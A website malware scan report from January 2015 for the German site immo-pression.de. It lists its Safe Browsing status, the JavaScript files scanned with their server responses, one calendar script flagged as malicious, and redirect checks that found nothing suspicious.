Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=immo-pression.de
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.immo-pression.de/ | 200 OK Content-Length: 29486 Content-Type: text/html | clean |
http://www.immo-pression.de/mainmenu/images.js | 200 OK Content-Length: 464 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/tracking.js | 200 OK Content-Length: 2246 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/includes/portalconfig/jqueryui/js/jquery-1.7.1.min.js | HTTP/1.1 302 Found Connection: close Date: Sun, 18 Jan 2015 19:31:22 GMT Location: http://www.immo-pression.de/403.php Server: Apache/2.2.22 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.immo-pression.de/403.php | 403 Forbidden Content-Length: 21393 Content-Type: text/html | clean |
http://www.immo-pression.de/includes/portalconfig/jqueryui/js/jquery-ui-1.8.18.custom.min.js | HTTP/1.1 302 Found Connection: close Date: Sun, 18 Jan 2015 19:31:23 GMT Location: http://www.immo-pression.de/403.php Server: Apache/2.2.22 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.immo-pression.de/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 18 Jan 2015 19:31:23 GMT Location: http://www.immo-pression.de/404.php Server: Apache/2.2.22 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.immo-pression.de/404.php | 404 Not Found Content-Length: 22031 Content-Type: text/html | clean |
http://www.immo-pression.de/javascripts/lade_popup_nonssl_de.js | 200 OK Content-Length: 2869 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/javascripts/lade_funktionen.js | 200 OK Content-Length: 2311 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/includes/portalconfig/kalenderedit/tcal.js | 200 OK Content-Length: 17121 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://www.immo-pression.de/admin/ajax/ajax.js | 200 OK Content-Length: 5162 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/ajax-dynamic-list.js | 200 OK Content-Length: 10044 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/_geodaten.js | 200 OK Content-Length: 15464 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/_suchenkriterien_stadtteile.js | 200 OK Content-Length: 2733 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/_suchenkriterien.js | 200 OK Content-Length: 3657 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/js/ib.js | 200 OK Content-Length: 855 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/js/overlib_mini.js | 200 OK Content-Length: 37522 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: immo-pression.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: immo-pression.de
Referer: http://www.google.com/search?q=immo-pression.de
Result:
The result is similar to the first query. There are no suspicious redirects found.